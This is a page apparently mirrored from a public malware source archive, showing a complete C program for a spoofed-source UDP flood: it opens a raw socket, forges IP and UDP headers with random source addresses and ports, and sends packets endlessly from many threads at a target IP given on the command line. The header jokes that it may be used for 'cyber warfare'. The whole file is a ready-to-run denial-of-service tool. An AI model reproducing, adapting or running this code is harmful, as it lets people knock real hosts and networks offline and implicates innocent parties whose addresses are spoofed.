mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-19 09:56:10 +00:00
184 lines
4.9 KiB
C
184 lines
4.9 KiB
C
/*
|
|
This is released under the GNU GPL License v3.0, and is allowed to be used for cyber warfare. ;)
|
|
*/
|
|
#include <time.h>
|
|
#include <pthread.h>
|
|
#include <unistd.h>
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <string.h>
|
|
#include <sys/socket.h>
|
|
#include <netinet/ip.h>
|
|
#include <netinet/udp.h>
|
|
#define MAX_PACKET_SIZE 4096
|
|
#define PHI 0x9e3779b9
|
|
static uint32_t Q[4096], c = 362436;
|
|
struct thread_data{
|
|
int throttle;
|
|
int thread_id;
|
|
struct sockaddr_in sin;
|
|
};
|
|
void init_rand(uint32_t x)
|
|
{
|
|
int i;
|
|
Q[0] = x;
|
|
Q[1] = x + PHI;
|
|
Q[2] = x + PHI + PHI;
|
|
|
|
for (i = 3; i < 4096; i++)
|
|
Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
|
|
}
|
|
uint32_t rand_cmwc(void)
|
|
{
|
|
uint64_t t, a = 18782LL;
|
|
static uint32_t i = 4095;
|
|
uint32_t x, r = 0xfffffffe;
|
|
i = (i + 1) & 4095;
|
|
t = a * Q[i] + c;
|
|
c = (t >> 32);
|
|
x = t + c;
|
|
if (x < c) {
|
|
x++;
|
|
c++;
|
|
}
|
|
return (Q[i] = r - x);
|
|
}
|
|
char *myStrCat (char *s, char *a) {
|
|
while (*s != '\0') s++;
|
|
while (*a != '\0') *s++ = *a++;
|
|
*s = '\0';
|
|
return s;
|
|
}
|
|
char *replStr (char *str, size_t count) {
|
|
if (count == 0) return NULL;
|
|
char *ret = malloc (strlen (str) * count + count);
|
|
if (ret == NULL) return NULL;
|
|
*ret = '\0';
|
|
char *tmp = myStrCat (ret, str);
|
|
while (--count > 0) {
|
|
tmp = myStrCat (tmp, str);
|
|
}
|
|
return ret;
|
|
}
|
|
unsigned short csum (unsigned short *buf, int nwords)
|
|
{
|
|
unsigned long sum;
|
|
for (sum = 0; nwords > 0; nwords--)
|
|
sum += *buf++;
|
|
sum = (sum >> 16) + (sum & 0xffff);
|
|
sum += (sum >> 16);
|
|
return (unsigned short)(~sum);
|
|
}
|
|
void setup_ip_header(struct iphdr *iph)
|
|
{
|
|
iph->ihl = 5;
|
|
iph->version = 4;
|
|
iph->tos = 0;
|
|
iph->tot_len = sizeof(struct iphdr) + 1028;
|
|
iph->id = htonl(54321);
|
|
iph->frag_off = 0;
|
|
iph->ttl = MAXTTL;
|
|
iph->protocol = IPPROTO_UDP;
|
|
iph->check = 0;
|
|
iph->saddr = inet_addr("192.168.3.100");
|
|
}
|
|
void setup_udp_header(struct udphdr *udph)
|
|
{
|
|
udph->source = htons(5678);
|
|
udph->check = 0;
|
|
char *data = (char *)udph + sizeof(struct udphdr);
|
|
data = replStr("\xFF" "\xFF" "\xFF" "\xFF", 256);
|
|
udph->len=htons(1028);
|
|
}
|
|
void *flood(void *par1)
|
|
{
|
|
struct thread_data *td = (struct thread_data *)par1;
|
|
char datagram[MAX_PACKET_SIZE];
|
|
struct iphdr *iph = (struct iphdr *)datagram;
|
|
struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr);
|
|
struct sockaddr_in sin = td->sin;
|
|
char new_ip[sizeof "255.255.255.255"];
|
|
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
|
if(s < 0){
|
|
fprintf(stderr, "Could not open raw socket.\n");
|
|
exit(-1);
|
|
}
|
|
memset(datagram, 0, MAX_PACKET_SIZE);
|
|
setup_ip_header(iph);
|
|
setup_udp_header(udph);
|
|
udph->dest = htons (rand() % 20480);
|
|
iph->daddr = sin.sin_addr.s_addr;
|
|
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
|
|
int tmp = 1;
|
|
const int *val = &tmp;
|
|
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
|
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
|
|
exit(-1);
|
|
}
|
|
int throttle = td->throttle;
|
|
uint32_t random_num;
|
|
uint32_t ul_dst;
|
|
init_rand(time(NULL));
|
|
if(throttle == 0){
|
|
while(1){
|
|
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
|
|
random_num = rand_cmwc();
|
|
ul_dst = (random_num >> 24 & 0xFF) << 24 |
|
|
(random_num >> 16 & 0xFF) << 16 |
|
|
(random_num >> 8 & 0xFF) << 8 |
|
|
(random_num & 0xFF);
|
|
|
|
iph->saddr = ul_dst;
|
|
udph->source = htons(random_num & 0xFFFF);
|
|
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
|
|
}
|
|
} else {
|
|
while(1){
|
|
throttle = td->throttle;
|
|
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
|
|
random_num = rand_cmwc();
|
|
ul_dst = (random_num >> 24 & 0xFF) << 24 |
|
|
(random_num >> 16 & 0xFF) << 16 |
|
|
(random_num >> 8 & 0xFF) << 8 |
|
|
(random_num & 0xFF);
|
|
|
|
iph->saddr = ul_dst;
|
|
udph->source = htons(random_num & 0xFFFF);
|
|
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
|
|
while(--throttle);
|
|
}
|
|
}
|
|
}
|
|
int main(int argc, char *argv[ ])
|
|
{
|
|
if(argc < 4){
|
|
fprintf(stderr, "Invalid parameters!\n");
|
|
fprintf(stdout, "Usage: %s <IP> <throttle> <threads> <time>\n", argv[0]);
|
|
exit(-1);
|
|
}
|
|
fprintf(stdout, "Setting up Sockets...\n");
|
|
int num_threads = atoi(argv[3]);
|
|
pthread_t thread[num_threads];
|
|
struct sockaddr_in sin;
|
|
sin.sin_family = AF_INET;
|
|
sin.sin_port = htons (rand() % 20480);
|
|
sin.sin_addr.s_addr = inet_addr(argv[1]);
|
|
struct thread_data td[num_threads];
|
|
int i;
|
|
for(i = 0;i<num_threads;i++){
|
|
td[i].thread_id = i;
|
|
td[i].sin = sin;
|
|
td[i].throttle = atoi(argv[2]);
|
|
pthread_create( &thread[i], NULL, &flood, (void *) &td[i]);
|
|
}
|
|
fprintf(stdout, "Starting Flood...\n");
|
|
if(argc > 5)
|
|
{
|
|
sleep(atoi(argv[4]));
|
|
} else {
|
|
while(1){
|
|
sleep(1);
|
|
}
|
|
}
|
|
return 0;
|
|
} |